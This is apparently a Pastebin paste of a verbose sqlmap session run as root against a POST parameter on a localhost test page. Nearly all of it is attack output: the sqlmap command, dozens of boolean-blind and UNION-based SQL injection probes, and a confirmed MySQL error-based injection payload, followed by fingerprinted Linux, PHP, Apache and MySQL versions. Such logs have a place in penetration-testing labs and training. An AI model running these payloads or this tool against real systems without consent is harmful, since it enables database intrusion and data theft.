Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/test.php" --data "post=ValidValue" -v 3
- sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
- http://sqlmap.sourceforge.net
- [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
- [*] starting at: 18:57:50
- [18:57:50] [DEBUG] cleaning up configuration parameters
- [18:57:50] [DEBUG] setting the HTTP timeout
- [18:57:50] [DEBUG] setting the HTTP method to POST
- [18:57:50] [DEBUG] creating HTTP requests opener object
- [18:57:50] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
- [18:57:50] [INFO] flushing session file
- [18:57:50] [INFO] testing connection to the target url
- [18:57:50] [INFO] heuristics detected web page charset 'ascii'
- [18:57:50] [INFO] testing if the url is stable, wait a few seconds
- [18:57:51] [INFO] url is stable
- [18:57:51] [INFO] testing if POST parameter 'post' is dynamic
- [18:57:51] [PAYLOAD] 2568
- [18:57:51] [WARNING] POST parameter 'post' appears to be not dynamic
- [18:57:51] [PAYLOAD] ValidValue(""''")"))
- [18:57:51] [WARNING] heuristic test shows that POST parameter 'post' might not be injectable
- [18:57:51] [INFO] testing sql injection on POST parameter 'post'
- [18:57:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
- [18:57:51] [PAYLOAD] ValidValue) AND 5020=4925 AND (6861=6861
- [18:57:51] [PAYLOAD] ValidValue) AND 9321=9321 AND (4890=4890
- [18:57:51] [PAYLOAD] ValidValue) AND 4581=8351 AND (603=603
- [18:57:51] [PAYLOAD] ValidValue AND 941=818
- [18:57:51] [PAYLOAD] ValidValue AND 9321=9321
- [18:57:51] [PAYLOAD] ValidValue AND 4211=6966
- [18:57:51] [PAYLOAD] ValidValue') AND 2463=5738 AND ('TqNu'='TqNu
- [18:57:51] [PAYLOAD] ValidValue') AND 9321=9321 AND ('hhWf'='hhWf
- [18:57:51] [PAYLOAD] ValidValue' AND 9360=3522 AND 'Eoek'='Eoek
- [18:57:51] [PAYLOAD] ValidValue' AND 9321=9321 AND 'DWWY'='DWWY
- [18:57:51] [PAYLOAD] ValidValue' AND 9124=7295 AND 'YwMD'='YwMD
- [18:57:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
- [18:57:52] [PAYLOAD] ValidValue' UNION ALL SELECT NULL# AND 'gyUu'='gyUu
- [18:57:52] [PAYLOAD] ValidValue' UNION ALL SELECT NULL, NULL# AND 'wZRI'='wZRI
- [18:57:52] [PAYLOAD] ValidValue' UNION ALL SELECT NULL, NULL, NULL# AND 'iTmP'='iTmP
- [18:57:52] [PAYLOAD] ValidValue' UNION ALL SELECT NULL, NULL, NULL, NULL# AND 'eYoS'='eYoS
- [18:57:52] [PAYLOAD] ValidValue' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND 'WrkX'='WrkX
- [18:57:52] [PAYLOAD] ValidValue' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND 'gPRj'='gPRj
- [18:57:52] [PAYLOAD] ValidValue' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'iMRL'='iMRL
- [18:57:52] [PAYLOAD] ValidValue' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'UwSd'='UwSd
- [18:57:52] [PAYLOAD] ValidValue' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'MqkX'='MqkX
- [18:57:52] [PAYLOAD] ValidValue' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'adVH'='adVH
- [18:57:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
- [18:57:52] [PAYLOAD] ValidValue' UNION ALL SELECT NULL-- AND 'udKY'='udKY
- [18:57:52] [PAYLOAD] ValidValue' UNION ALL SELECT NULL, NULL-- AND 'vUtp'='vUtp
- [18:57:52] [PAYLOAD] ValidValue' UNION ALL SELECT NULL, NULL, NULL-- AND 'tPRS'='tPRS
- [18:57:52] [PAYLOAD] ValidValue' UNION ALL SELECT NULL, NULL, NULL, NULL-- AND 'EIPF'='EIPF
- [18:57:52] [PAYLOAD] ValidValue' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND 'niei'='niei
- [18:57:52] [PAYLOAD] ValidValue' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND 'QTPN'='QTPN
- [18:57:52] [PAYLOAD] ValidValue' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'AXKH'='AXKH
- [18:57:52] [PAYLOAD] ValidValue' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'YTOV'='YTOV
- [18:57:52] [PAYLOAD] ValidValue' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'lldQ'='lldQ
- [18:57:52] [PAYLOAD] ValidValue' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'HMey'='HMey
- POST parameter 'post' is vulnerable. Do you want to keep testing the others? [y/N] N
- sqlmap identified the following injection points with a total of 37 HTTP(s) requests:
- ---
- Place: POST
- Parameter: post
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: post=ValidValue' AND (SELECT 8669 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,97,104,58),(SELECT (CASE WHEN (8669=8669) THEN 1 ELSE 0 END)),CHAR(58,108,107,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KcYk'='KcYk
- ---
- [18:57:54] [INFO] manual usage of POST payloads requires url encoding
- [18:57:54] [INFO] the back-end DBMS is MySQL
- web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
- web application technology: PHP 5.3.2, Apache 2.2.14
- back-end DBMS: MySQL 5.0
- [18:57:54] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
- [*] shutting down at: 18:57:54
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement